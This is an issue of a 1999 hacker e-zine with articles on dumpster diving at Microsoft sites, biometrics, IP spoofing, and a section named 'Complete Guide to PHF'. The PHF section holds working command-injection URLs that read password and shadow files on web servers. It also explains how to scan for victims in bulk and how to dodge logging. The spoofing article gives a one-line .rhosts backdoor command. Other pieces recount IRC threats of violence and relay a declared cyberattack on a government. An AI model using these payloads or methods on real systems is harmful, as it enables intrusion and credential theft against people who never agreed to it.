___________.__ ________ ____. \__ ___/| |__ ____ \______ \ ____ | | | | | | \_/ __ \ | | \ / _ \ | | | | | Y \ ___/ | ` ( <_> )\__| | |____| |___| /\___ > /_______ /\____/\________| \/ \/ \/ :The Discordant Opposition Journal Issue #2: :Feb 99, Third release, http://www.Rue-the-Day.net/discordia: ::::::::::: Editor-in-Chief :::: Rue-the-Day ::::::::::: ::::::::::: Chief-in-Editor :::: Cronus ::::::::::: ::::::::::: Assist Editor :::: Digital Avatar ::::::::::: ::::::::::: In-House Writer :::: Kleptic ::::::::::: ::::::::::: Hosting :::: ethercat ::::::::::: E-Mail discordia@Rue-the-Day.net "There are no mere facts, only interpretations" - Nietszche Special thanks go out to Michael Perryman for contributions to the Gallery. :The Discordant Opposition Journal Issue 2, February 1999. All Rights Reserved. Nothing may be reproduced in whole or part without written permission from the editors. The DoJ is made public at irregular periods, but don't worry you won't miss us. :This is the third issue of the DoJ, issue #2 and the Editors and staff would like to dedicate this release to the workings of eccentricMind. Founder of the Discordant Knights and leader of this electronic revolution. Thanks eM. :Contents: File 1 - Editorial : Editors 2 - The Joys of Trashing : Rue-the-Day 3 - The Darkedge Incident : Editors 4 - The Science of Biometrics : Cronus 5 - The Complete Guide to PHF : Digital Avatar 6 - Interview with Digital Avatar : Editors 7 - Behind IP Spoofing : Cronus 8 - Ask Dr. Klep : Kleptic 9 - The Viewing Public : Audience 10 - Conclusion : Editors :Editorial: Well, here we are. Welcome back to the Famed Goldmines of The Discordant Opposition Journal. The true Underground E-Zine for the future. We managed to churn out another issue. This it the third issue, #2. Don't ask why its number 2 and issue 3. I blame it on one of Rue's made drinking binges. I am writing this on a Sunday afternoon. I went to bed at 7:45 this morning and got only 3 hours sleep. Rue and myself spent 8 straight hours slouched infront of a computer screen. We took turns sitting at the computer picking through networks and stuff. In the end, it was quite uneventful but it was informative. We may do a write-up of Moroccan government security protocols in a future issue. Yes, you read right, we too are Publicly announcing our distaste on Moroccan Human Rights. The country is so antiquated that they do not as of yet have a proper voting system. Some would say that to vote the public must be educated. But those that are undereducated would have no want to vote thus nullifying that argument. Why should Moroccan people, who are no different to us, suffer more simply because democracy hasn't reached them yet. When freedom is threatened in Middle Eastern countries or Eastern Bloc Countries the Allied forces are swift to intervene, but they have all chosen to stay well out of the Moroccan problem. The Knights of Dynamic Discord have told the Editors that currently they are launching an information attack on the resources of Morocco and its government. They have issued this statement; 'No one deserves this and we who are able to, should fight for their rights. The Knights of Dynamic Discord hereby declare information war on the infrastructure of the Moroccan Government. All Hail Discordia !' -Issued by Deadpool and eccentricMind. That is the editorial for this issue. We the Editors of The DoJ hereby claim no responsibility or involvement in any KoDD actions. The conclusion has the usual junk in it about the Zine. Thank You. Cronus, Rue-the-Day ::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99 ::: The Discordant Opposition Journal ::: Issue 2 - File 2 ::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :The Joys of Trashing: Rue-the-Day Prologue: Rue-the-Day and Cronus, your intrepid DoJ editors, caught momentarily in a van's headlights as they try to blend into the shadows. The van is 'Group 4 Security' - private rent a cop types. Rue-the-Day and Cronus are standing in the darkness between two Microsoft buildings. The van's driver fails to notice them and continues on his rounds. The two hackers breathe a sigh of relief and start back towards the main road.... Onwards: That night had already been eventful. Earlier on we had prowled around two other Microsoft 'campus' areas. The first had been dull, lots of CCTV cameras and bins padlocked into cages. The second area had been of greater interest. Myself and Cronus had noticed a row of bins and a dumpster in a parking lot beside a building. We peered into the dumpster and found nothing much until I noticed that one of the bins was labelled "Paper Waste Only".. Hehehe. We took the lid off the bin and started going through the blue tinted bags for documents of interest. This activity had us absorbed until we heard a key turning in a door behind us. As we turned we saw a guard trying to get the door of a nearby building open. After some fumbling he succeeded and the appropriate thing to do seemed to be to run like bloody hell. I squeezed through the gap between the dumpster and bin and tried to run. The problem was, I wasn't moving - my backpack was stuck. Cronus was understandably concerned - he was in the path of the rapidly approaching (pissed off looking) security guard. He punched my backpack through the gap and we both sprinted off carrying bags of Microsoft documents with us. We ran out into traffic, over a large mound of dirt and across a patch of wasteland before finally stopping. At the bottom of this file are some interesting extracts from our find... Advice: Some general things to keep in mind. Try your best to be selective when trashing, discard unnecessary stuff - it'll just weigh you down. Choosing to trash either by day or night both have inherent advantages and disadvantages. ::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99 ::: The Discordant Opposition Journal ::: Issue 2 - File 3 ::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :The Darkedge Incident: The Editors Darkedge is an Irish guy who hangs out on Dalnet. Cronus is also Irish and also hangs out on Dalnet in roughly the same areas as Dark. Cronus had been mail bombed with an expression that Dark had yelled at him earlier after being kicked from a channel that Cronus was opped in. And Cronus went looking for Darkedge on IRC. /whois Darkedge Gave this; [ %%%%%%%%%%%%%%%%%%(whois info: Darkedge)%%%%%%%%%%%%%%%%%% ] [ address ] dark@apollo.netsoc.tcd.ie [ quote ] Dark Edge [ channels ] @#tcdnerds #hackers_ireland [ server ] liberty.nj.us.dal.net Tdc.ie is Trinity College Dublin in Ireland and he was at the computer labs there in the city centre. Cronus and Rue were at Cronus's house online. hi <^cronus^> I had some trouble with my mail account ealrier <^cronus^> don't suppose you know anything about it ? ohh thats right me well thank you for your faith in me cron <^cronus^> What ? <^cronus^> I have no faith in you <^cronus^> do you know about it ? can i ask a question <^cronus^> what ? am i the first person that came to mind about it <^cronus^> I have already asked 5 people today heh just askin nope not me <^cronus^> what wasn't you ? mail bombing is for lamers <^cronus^> YOU FUCKER <^cronus^> I never fucking mentioned mail bombing <^cronus^> you WANKER ! what else would it be <^cronus^> could have been a virus, lack <^cronus^> of working server <^cronus^> anything... jeasus <^cronus^> you fuckin idiot you're fucked <^cronus^> Rue has vaguely mentioned breaking of legs... what?? fuck you ....let rue try...i have nothing to do with any shit you are saying....go blame someone else <^cronus^> right so then <^cronus^> will you still be in town in 15 minutes ??? what are you talking about <^cronus^> Rue will be there in a few minutes is that ok ? <^cronus^> he is in temple bar at the moment <^cronus^> at a cyber cafe... what are you on ?? <^cronus^> you got yourself into a shit storm now are you playing a fucking joke on me?? <^cronus^> a joke ? <^cronus^> you asked for Rue to break your legs <^cronus^> does it sound like Rue's laughing ? At this point, Cronus and Rue set up a Back Orifice server to bounce a connection from a Cyber Cafe to IRC. They had been at the BetaCafe in the City earlier that day and set it up. [join(#hackers_ireland)] Rue-the-Day (BetaCafe@betacafe3.betacafe.ie) [mode(#hackers_ireland)] "+o Rue-the-Day" by ChanServ Sup All Rue? Hi Cronus what the fuck is going on Hey Daxxx, Zeris ahh Darkedge <^cronus^> Hey RUE ! what am i being blamed for?? I'm in the beta cafe in temple bar what seems to be the trouble ?? On checking where Rue was, it seemed that he wasn't simply at Cronus's house but actually in Town near Trinity College. At this point we were both beginning to laugh heartily. [ %%%%%%%%%%%%%%%%%%(whois info: Rue-the-Day)%%%%%%%%%%%%%%%%%% ] [ address ] BetaCafe@betacafe3.betacafe.ie [ quote ] Rueful [ channels ] @#hackers_ireland [ server ] powertech.no.eu.dal.net Im in trinity Your in trinity ? I could be there in a minute or two... <^cronus^> Rue is kinda protective of his friends Darkedge was pretty scared by this stage, but the plot went on. anyway I have to go I'll be back on later places to go, people to see <^cronus^> cya Rue - maybe later anyway gotta go [signoff(#hackers_ireland)] Rue-the-Day (Quit: Gone to Trinity) hang on rue shit Cronus continued to talk with Darkedge in private. Rue was hysterical at this point. <^cronus^> How long do you think Rue can walk from Temple Bar ? <^cronus^> 5 minutes ? you think <^cronus^> although he is very tall and walks fast i will be here all night <^cronus^> whats wrong ? <^cronus^> afraid to face him ? <^cronus^> I've meet you and your half his size.... yeah well well i have a lot of friends so <^cronus^> alot of friends ??? <^cronus^> they won't protect you <^cronus^> you haven't meet Rue its a pity really see here is the thing he can throw as many punches as he wants ... i dont care <^cronus^> the doctors will care ! <^cronus^> and who mentioned punchs <^cronus^> its the metal bar you should worried about he can kill me...like i give a shit <^cronus^> I'm sure he'll try <^cronus^> you don't care for your life ? <^cronus^> cause niether does he ! ahh well just wish it could have been different <^cronus^> I can't wait to see this <^cronus^> Infact <^cronus^> I think I'm gonna come into town <^cronus^> and have a look at the bruises <^cronus^> ... hehe ... <^cronus^> Cya in about 15 minutes Cronus quit off IRC but then came back right away and Darkedge had already gone off. Cronus and Rue were both far from the City Center, but Darkedge left Trinity afraid that Rue was on his way. It was never mentioned again, but at the next 2600 Meeting in the City, Darkedge pulled Cronus and Rue aside and apologised and claimed innocence. We both still laugh about the whole thing to this day. Beware. ::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99 ::: The Discordant Opposition Journal ::: Issue 2 - File 4 ::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :The Science of Biometrics: Cronus Biometrics is the upcoming science of authorising people by their individual physical characteristics. Finger printing is the oldest and most widely used biometrics. I was waiting for this file to be published by a large Hacking site that will go unnamed. Each time I dropped by, it would still say Not yet finished, check back next month. So I decided to write the article myself and here you go. Explanation Passwords have been shown to be unsecured time after time. It is a widely held believe that the weakest part of any security system is the password. Behind the password is a User, who is forgetful and absentminded at the best of time. So modern science has stepped up to the plate and offered an alternative. Biometrics is the art of recognising individuals by their unique and untransferable physical characteristics. Biometrics are by no means new. They have been around for years but until recently the price was always a limiting factor. The US military have used it as a form of authentication since well before the cold war. No, however, finger print readers are cheap enough to be built into keyboards and mice. Biometrics are so unique that they need never be changed. They are part of you, so they can never be stolen. They are constant and effortless to use. And they are extremely safe. For example the eye scanner from the New Jersey based company Iriscan, offers the odds of one-in-10 to the power of 78. The Fingerprint It has been the practice of Police and Government agencies all over the globe to use the unique pattern of the fingerprint as a form of Biometric. This is both cheap and easily maintained. An example of PC fingerprinting is Sony Corp.'s Puppy Logon System at www.iosoftware.com. Cheap, reliable and already in the mainstream. As the fingerprint has been in use for so long. It has proved itself as a reliable Biometric and also it has dropped in price. The Hand A handprint is simply an fingerprint on a larger scale. Hand scanners, such as the $2,150 HandKey manufactured by Recognition Systems Inc., measure the hand's geometry rather than fine skin patterns, so they're useful in places such as shop floors and manufacturing operations, where dirt and nicks could cause problems with a finger scan. As yet pretty well untested on a large scale. But still very cheap. Fairground 'Love Testers' are often based on a hand scanner and this shows there ease of use and cheapness. There is a new technique that records the vein pattern at the back of the hand. This technique looks promising, but it exists only in a prototype system, and no extensive tests to determine the performance of the method have been done. However, this could well become an important biometric identification method. The Eye A person's eye is as unique as a fingerprint and can be used to identify someone. IriScan Inc.'s namesake product keeps an eye on high-security facilities. The unique pattern of the iris of the eye is measured and compared to a database of known values. The pattern on the iris is so unique that the chance of mix-up is infinitesimally small. IriScan is designed for physical access control, generally coming in the form of a wall mounted reader. The system is currently in use in prisons and military facilities for its security. As the pattern matching software is currently being adapted to accommodate face recognition for future planed products. The reader, software and PC cost $6,500. IriScan can be reached at www.iriscan.com. The Face The ideal biometric identification method would be automatic face recognition. This is a difficult pattern recognition problem because heads can rotate and move in various ways. Pattern recognition software can be used in airports and border crossings to catch criminals and terrorists. The facial software matches distinct features of the human face to a digitally recorded copy to determine if the scanner recognises you. Very new and still quite experimental. This form of Biometric can't really take into account the change of appearance caused by ageing, sickness or hair growth. Extremely complex software must be written to ensure the error level of the system is kept to a minimum. If short, not a very secure Biometric. More than a dozen vendors offer facial recognition products, which can cost as little as $150 to $300 per node. The Voice Voice verification is by far the most socially acceptable Biometric. It combines ease-of-use with lack of cost. It has several distinct advantages over the other biometric techniques. First, it's perfect for telecommunications applications. Second, most modern PCs already have the necessary hardware. If they don't, a 16-bit sound card can be purchased for about $50, and a condenser microphone costs about $10. Voice patterns are easily recorded and digitised, but the voice changes because of the time of day, illness and background noise. This means that even though this is perhaps the most convenient Biometic it is also probably the most insecure. Taped speech has been known to defeat this medium of authentication. Hardly secure. The Signature Some Biometric products observe hand-written signatures. The process requires a digitising tablet such as a Wacom PenPartner. Not widely used and not secure at all. The signature is as weak as a password. Only a Biometric by the vaguest of senses. The Smart Card The Biometrics of the future will possibly be packaged with Smart Cards. Your individual Biometric data will be hard-coded into the Smart Card and not matter where you are, the Biometric will be able to verify that it is really you once you have your Smart Card. Security Most Biometrics are quite secure and that is why they are favoured to te antique password. But simply because its a Biometric doesn't make it secure. Anywhere that needs the level of security that comes with a Biometric should do some research to ensure that they are getting a suitable type. The US military has been using many different forms of Biometry for years and this stands for its reliability and overal security. Not to be underestimated, but Biometrics will become the next major obstacle for the Wily Hacker. Links Here are links to more information on Biometrics; Security gets a facelift http://www.zdnet.com/pcweek/reviews/1027/srbio.html How biometric technology will fuse flesh and machine http://www.privacy.org/pi/reports/biometric.html Biometrics Consortium http://www.biometrics.org/ Fight the Fingerprint http://www.NetworkUSA.org/fingerprint.shtml Show me some ID http://www.zdnet.com/pcweek/news/0112/12bio.html Biometrics Explained http://www.ncsa.com/services/consortia/cbdc/explained.htm ::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99 ::: The Discordant Opposition Journal ::: Issue 2 - File 5 ::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :The Complete Guide to PHF: Digital Avatar 1. What is PHF? The PHF (packet handler function) white pages directory services program distributed with the NCSA httpd, versions 1.5a and earlier, and also included in the Apache distribution prior to version 1.0.5, passes unchecked newline (hex 0a) characters to the Unix shell. Unauthorised access to the server host may allow an intruder to read, modify, or destroy files. The phf program implements a form-based interface to a local CCSO Name Server. The CCSO Name Server is a white pages service used for looking up name and address information about people. With phf, a hacker can execute commands on the server host using the same user-id as the user running the "httpd" server. If "httpd" is being run as root, the hacker's commands are also run as root. He can access any file on the system that is accessible to the user-id that is running the httpd server. The phf phone book script file in the cgi-bin directory can be exploited to give a hacker the password (etc/passwd) file in Unix systems. The phf phone book script is distributed with NCSA and Apache httpd. This default file is a sample form titled "Form for CSO PH query" and can be exploited to view files on a system. The phf exploit is one of the most common ways of obtaining password files of of systems on the internet. 2. How do I use PHF? Alright. To use PHF you enter the following command line into any web browser: http://www.target_goes_here.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd This takes you to the /etc/passwd file of the target computer. Neat, huh? Anything after Qalias=x%0a/bin/ is the command. You can do virtually any command. You cannot edit files though. It doesnt work. Examples: /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/shadow -displays the shadow file /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd -displays the passwd file /cgi-bin/phf?Qalias=x%0a/bin/ls%20/ -lists the root dir /cgi-bin/phf?Qalias=x%0a/bin/ls%20/bin -lists the bin dir /cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/bin -lists the bin dir and shows file permissions /cgi-bin/phf?Q=%0aid - gives you the uid of nobody /cgi-bin/phf?Q=%0a/bin/uname%20-a - give operating system /cgi-bin/phf?Q=%0apwd - print working directory /cgi-bin/test-cgi?* - get all files in /cgi-bin/ /cgi-bin/test-cgi?/* - get all directories /cgi-bin/nph-test-cgi?* - get all files in /cgi-bin/ /cgi-bin/nph-test-cgi?/* - get all directories /cgi/bin/phf?Q=%0a/bin/ypcat%20passwd - get ypcat passwd 3. What happens if it says "404 Error" or "Caught on Candid Camera"? Well, a 404 Error indicates that the target is patched of this hole already or that they do not have PHF on their system, among other things. If it gives you a 404, move on to a new target. Caught on Candid Camera is a small joke in a way. When you get this screen it means they have logged that you have just tried to access them via PHF. Don't worry about getting caught though. They hardly ever report it. Just don't go try the same place every time. If they are logging you then they might get a little curious after you try PHF on them 10 times. Use PHF wisely. 4. How do I find new targets? The usual way to get new targets is to pick a country, say Japan. Go to www.altavista.com, next and search for "ac.jp". This will turn up a lot of results from the academic hosts in Japan. Take each listing's address and put it before the /cgi-bin in the PHF command line. You can scan all the results quite quickly if you have two browser windows open. One contains: http://www.target_goes_here.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd The other contains your altavista search. Simply Copy the address from altavistsa and paste it onto the www.target_goes_here.com in your other window. You can go through 75-100 sites quite easily. I tend to get about 1/100 hits that have a usable PHF. Don't expect anything better... -Digital Avatar apparitione@gmx.de ::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99 ::: The Discordant Opposition Journal ::: Issue 2 - File 6 ::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :Interview with Digital Avatar: Shortly after we first DoJ was released we already decided that we need Staff. Digital Avatar was the first. He quickly became the Assistant Editor. Helping with promotion, editing and also submissions. DoJ: How long have you been in the h/p scene ? DA: Since about 1992. I was 13 then and I was just playing around, but it helped... DoJ: What drew you in ? DA: I had watched some movies here and there and had seen some things on the news. So I decided to just check a few things out. My very first impression of the scene occured when I typed "Hacking" into Yahoo. It really is that easy. DoJ: What particular aspects interest you ? DA: The 'culture' of the underground. It is a vastly changing region. One day a so-called wizard can be declared lame by hundreds of people and thats that. There isnt the usual cover-up of things here on the scene. The entire style is different than the real world. Its quite intersting. DoJ: What would you attribute to your main decision to want to learn ? DA: Probably all the clueless and not-so-clueless people out there who are bored and want to push their computing power beyond 'normal' boundries. Anyone can master these kind of things...so why shouldnt you try it once, at least? DoJ: Have you ever been caught ? or gotten close ? DA: Yes. My ISP's have gotten mad and threatened me and cancelled my service a bunch. I try not to do anything that will land me in jail. Do I play it safe? Yes. DoJ: Do you follow any set of morals or is the chase of knowledge more important ? DA: I dont hack politically, racially, for pr0n, power, or anything like that. I do it to test myself. It truly is the best game there is... DoJ: On a topical subject, what is your opinion of the current trend to attack unfavourable countries ? DA: I think that is really the wrong thing to do. Tampering with or "destroying" the computers of unfavorable countries is not going to do any good. The people need to be changed, not the machines. DoJ: Whats the one thing you want the world to know about you ? DA: I hate printers. DoJ: Where and how can you be contacted ? DA: E-Mail is the only sure way to reach me. I'm currently using apparitione@gmx.de. If I change my address and you get too stressed out then go and take a look at my page [ http://members.xoom.com/damatrix/ ] and click "contact". That will always have an address that I will be receiving at. DoJ: Perhaps a quote to finish off with ? DA: 'Trust No One' Fill-in the Blanks; Choice of Women: 'Dumb Blondes' OS: FreeBSD on a 486 Food: Chips, Fries, Pepsi, and OJ [ not mixed ] Music: Pop/Techno...Beck, Beastie Boys, etc Films: Armageddon, the James Bond films... Sites: hackernews.com, cnn.com, yahoo.com DoJ: Anything else ? A comment to someone you don't like perhaps... DA: I think that everyone needs to have more fun. People are too stressed out. DoJ: Thanks Digital DA: No problem... just get your hand off my thigh... !::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99 ::: The Discordant Opposition Journal ::: Issue 2 - File 7 ::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :Behind IP Spoofing: Cronus IP Spoofing is the art of hiding a connection behind packets that seem to come from some arbitrary source. Fooling a server into thinking your connection is coming from a spoofed source. This is the means by which a trust-related attack would take place. By appearing to come from somewhere else you would be able to circumvent any form of source authentication such as the legendary 'r' commands. I have taken the liberty of assuming that the reader has a partial knowledge of TCP and IP protocols. But if you don't there are references to some essential reading at the end. The one serious drawback to IP spoofing trust-related exploits is that the initial attack is blind. Since you are impersonating another server, you will be unable to accept any response from the server under attack. Establishing a Connection The TCP protocol is technically defined as a protocol developed to allow co-operating computers to share resources across a network. In other words, share a connection to transfer data. TCP is the most widely used connection-oriented transport protocol in the TCP/IP suite. This basically means that the two hosts involved must both first establish a connection through the form of 3-way handshake. All the 3-way handshake does is set up the routines to transfer data. Sequence numbers of both the hosts are exchanged so that a connection can be created. This 3-way handshake makes TCP harder to spoof then simple IP packets. The connection handshake is as followed; X ---SYN---> Y X <--SYN/ACK-- Y X ---ACK---> Y To begin with host X sends an IP packet with the SYN flag to Y. This tells host Y that a connection is about to be set up. The sequence number that X sends will now be set as the ISN (initial sequence number) for future communication. Host Y next will reply with its own ISN with the SYN flag on and an ACK flag. The ACK flag acknowledges X's first packet with its ISN plus one. X then ACK's the other hosts ISN and communication can take place. The Sequence Number TCP is marketed as the reliable internet protocol. It accounts for all packets, resends lost packets and rearranges out of order data. The sequence number is used so that the other host can acknowledge receipt of the packet. The receiving end uses the sequence number to ensure proper ordering of the data and to eliminate duplicate data bytes. Sequence numbers are simply 32-bit variables. They range from 0 to 4,294,967,295. Each packet sent across a TCP connection is sequenced. TCP uses the concept of window advertisement for flow control. The sliding window tells the other end of the connection how much data can be buffered, the window size is 16-bits so a receiving host can advertise up to a maximum of 65535 bytes. This process can be thought of as a means to ensure that neither host begins to transmit above the acceptable level of the other host. In order to spoof a connection, you must understand how sequence numbers are chosen and how they change throughout the connection. The sequence number when a host is first booted is set to 1. The initial sequence number is incremented by 128,000 every second. This causes the 32-bit ISN variable to wrap every 9.32 hours is no connections occur. But whenever a connection attempt is issued the ISN jumps by 64,000. This process is there to eliminate the possible problem that data from an old connection could arrive and damage the current connection. This is why random sequence numbers are not used. There would be no way to guarantee that arriving data would have a different sequence number as stray data that finally freed itself from a routing loop somewhere. Other Flags TCP header flags include RST (reset), PSH (push) and FIN (finish). The RST flag causes the connection to be immediately torn down. The RST flag is basically an in-built error message for when one host breaks the already established rules of connection. The PSH flag tells the receiver to send all the queued data as soon as possible. The FIN flag is the means whereby a host naturally closes a connections. Syn Flooding Once the trusted host is found, it must be disabled. Since the attack intends to impersonate it, it is necessary to make sure that the host cannot receive any extra network traffic. If it gets the TCP packets from the target host, it would send a packet to close the connection thinking it was an error. The best way to deny packets access to a server is to lock it up with some form of Denial of Service attack. This is quite a complex operation and requires much research. We have seen above how TCP connections are created and these steps to creating a connection can be used to the disadvantage of the trusted host. A Syn flood is a flood of specially crafter packets with the Syn flag marked from a random source. The trusted host picks up the packet and thinks that a connection is about to be made and sets up the appropriate service. By flooding the trusted server with random Syn packets it is possible to fill up the Process table and leave no more room for new incoming packets. As the connections time out while the trusted server waits for confirmation of the connection, it is necessary to fill the gap that is left. The attacker can send multiple Syn packets every few seconds to the trusted host and keep it occupied. For more information this complex subject see the notes at the end of the file. The Attack To use IP spoofing as an attack you must first choose a target and work out a trust-relationship that exists on that server. The sequence numbers are calculated. The trusted server is put into a continual Denial of Service attack and then impersonated. The attacker then simply issues a command to give him/her a way back in. Here is a step by step outline of the attack; X(forged as Z) ---SYN---> Y Z <--SYN/ACK-- Y X(forged as Z) ---ACK---> Y X(forged as Z) ---PSH---> Y The first packet from the attacker has the source IP address spoofed as Z which is the trusted host. Y responds with an Ack of the first packet to Z, but since the trusted host Z is in the middle of a storm of Syn packets it does not receive the Ack packet. The attacker must pause for a moment so that the target host Y actually has time to send the Ack packet. Then X sends its own Ack packet with the presumed sequence number plus one since it is the second Ack. If the calculated sequence number is correct then by the last stage the target host believes it is connected to the trusted host Z and data can be sent. Since the attack is blind, the general idea once the trust has been exploited is to insert a backdoor into the system. The most simplest could be 'cat + + >> ~/.rhosts`. This is a good idea because it is quick, allows for simple re-entry, and is not interactive. Remember the attacker cannot see any traffic coming from the target, so any responses are sent off into oblivion. Summary IP spoofing is not difficult because IP is easily forged. This attack works because many network connections rely on source authentication. The presumption is that source authentication is that it is easy and safe. But it is most definitely not the latter. The most difficult part of this attack is the sequence number calculation. This takes timing, skill and guesswork. Resources Request For Comments: 793, 1825, 1948 IP-spoofing Demystified - Trust-Relationship Exploitation by daemon9 / route / infinity http://www.phrack.com SYN Floods The cause and Cure by NeonSurge http://www.rhino9.org Introduction to the Internet Protocols by The Computer Science Facilities Group http://homepages.iol.ie/~cronus/ip/info70.txt ::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99 ::: The Discordant Opposition Journal ::: Issue 2 - File 8 ::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :Ask Dr. Klep - "Kleptic's Views": kleptic@grex.org Well, this text is just about what I've been thinking about lately. I've been thinking about many topics, some important, some not.. like "Why do you press harder on your remote controller for your TV when you know the batteries are dead" or "What would a chair look like if your legs bent the other way!?" and the most important, "If a tree fell in the woods and no one was around to see it, would the other trees make fun of it!?" Those are the not so important things I've been thinking about.. Yeah know what really pisses me off, all that Bill Clinton and Monica shit. I'm really tired of hearing about that.. and I'm sure all of you are too. First of all, I don't want him impeached, but I do think he's a jackass. Hey would you want Al Gore as president of the USA? I know I wouldn't. Yeah see I don't think like most 'computer analysts' or "hackers", most Hackers/phreaks/crackers/warez d00dz are mostly "anarchist". I believe in order in a country, if there wasn't any order people would cause havoc all the time.. and people would die. And I'm sure no one REALLY wants to die. And how come older people or adults think that teenagers, or people in the age area of 14-21 are nothing but a bunch of rowdy misfits!? And that we all have nothing to do but do drugs and have sex? That's not all true in fact. Not all kids do drugs or have sex. Yeah see I live a lifestyle that most of you have probably heard about. Its called "Straight Edge". Straight Edge meaning a drugfree lifestyle, 'don't drink and don't smoke" those are the rules of today... before back in the 1980's the rules were "Don't Drink, Don't Smoke, Don't Fuck" The term "Straight Edge" was coined by Ian McKaye, the singer from a 1980's hardcore/punk band called "Minor Threat". But im not gonna get into the history, I'm just trying to make a point. This text is kinda short, and most of you probably don't give a rats ass of what I'm thinking about, but I'm just trying to make a point, This is the way I feel, and I personally don't give a shit if you think otherwise. For the next instalment of "Ask Dr. Klep" I will need all of you to e-mail me questions or comments of anything in this text, or any other texts that I've written before, or any technical questions, I will answer them in the next Issue of DoJ. Thank You, Kleptic kleptic@grex.org http://wwz.net/kleptic/ ::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/98 ::: The Discordant Opposition Journal ::: Issue 2 - File 9 ::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :The Viewing Public: This is our mailbag. Our dirty electronic linen. Basically a dumping ground for mail we get about the DoJ but occasionally we will throw in a snippet that we consider humorous, scary or just plain disturbing... Cronus recently had an article printed in the Print Publication of Blacklisted 411 and received many mails on the topic, they are answered here. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: From: Core Subject: Co-operation I was just checking out your page and was wondering whether or not you would like to co-operate with me in attempting to bring about a total Boycott of Tinet in order to get them to bring down the phone charges? Mail me here if you think we can work something out. Freeman :Its worth noting that Tinet is Telecom Internet, an ISP run by the main telephone company here in Ireland. And unfortunately boycotting them will not by any means reduce phone charges. Infact since my site is a hacking site, whatever you had in mind is most likely illegal and I amn't interested, but thanks for the thought. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: From portcharlottesux@hotmail.com Subject: Mailbombs where can i download some decent chat bombs, mail bombs, im bombs, icq bombs, or any other progees? i would be greatly appreciative. e-mail me at portcharlottesux@hotmail.com :My oh my, you seem to have a bit of an unhealthy obsession on your hands there, well now that you've given out your email address in these hallowed pages I'm sure somebody will 'help' you with your request. For the ICQ bomb you'll have to send us your UIN, hehe.. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: From: "jastel marrell" Subject: EUA Greetings and Salutations Cronus, Just got done reading your article in the latest edition of Blacklisted 411. Good info. was wondering if you would be interested in doing similar articles for the Electronic Underground Affiliations E-Zine? The EUA is made up of various hacker org's around the world and we like to put out a monthly zine to keep our members informed of what's going on and what's new in the hacker/phreak underground. You can find us on the web @ "http://members.xoom.com/xxxxxxxx/" We've kept a low key for the past few for a couple of reasons, namely the events revolving around Kevin M. and Justin P. But alas, that has come about in a manner most unwanted. Drop me a line and let me know if you are up for writing a few articles for us. Thanks archive :Hi archive, I responded personally and just wanted to comment on your mail for our readership. I understand that you didn't realise that I am editor of this Zine, but may I presume to ask a few questions ? Why would a European E-Zine be worried about the prosecution of US hackers ? And why would a Publication choose for any reason to keep a low profile ? Why publish anything if you have to keep it low profile ? I censored your URL as you seemed very worried about staying low profile. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: From: Cigarjosey@aol.com Subject: better reception dear cronus I am a farmer and i love your articles in 411.i have an ericson kh668 and i wanted to hook up a external antenaa to my 80 foot silo. Radio shack has a filter for the phones frequencies but they dont have the tnc connecter. Ericsdonn wants a arm and a leg for their travel hook up. Can u help? thanks cigarjosey :Cigarjosey, if that is your REAL name. I am not sure I know what you are asking. Prehaps if you asked a question like 'Can you get me this thing ?' or 'Where should I go to buy it ?'. Until you phrase your mails according to the dictates of Modern English I will have to simply ignore you. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: From: "Ben Winston" Subject: I'm not so sure I wanna Help You Discordants Very, very cool site. :Hmm, yes. Nice and to the point. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: From: "DynamikHack" Subject: Wingating the Net I read your article about using IP spoofing through Wingate systems. At the end of it, it said that files such as an IP scanner are available on your site. However, I can't seem to find them. Can you provide me with a link to somewhere that I can get an IP scanner? thanks :Try www.warforge.com :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: From: "Kirby L. Wallace" Subject: oh yeah, one other thing... It's nice to find others who are interested in learning for the sake of learning, not for the sake of playing one-ups-manship with destructive behaviours that only prove what a moron one is. Good for you. Kirby :Thanks for the support Kirb. You will not be forgotten when the revolution comes... :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: Thanks about it for this issue. But keep those ridiculous questions coming cause the next issue will award a special prize to the most stupid mail we receive. ::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99 ::: The Discordant Opposition Journal ::: Issue 2 - File 10::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :Conclusion: Well there you all are for another issue. Hope it keep you as enthralled as previously. We try to keep up the usual degree of crap each issue. We are sure you lot have complaints so send them to discordia@Rue-the-Day.net and we'll probably ignore you. We have some complaints of our own. We started this Zine out of boredom and it seems that no-one is interested. Sure, we get loads of hits on the site. Loads of people download the Zine but apart from abuse. Rarely do we get a serious contributor. We need, I repeat WE NEED, submissions of stories, how-to's, art, poems, quotes, technical FAQ's, hacking texts, underground exploits and anything else you have lying around. Unlike the swanky print publications that you actually have to PAY for... the DoJ is free and we need your help to keep it up. Cronus and Rue do not intend to write anything for the next issue. We want your help in filling the space. Much thanks go out to Kleptic and 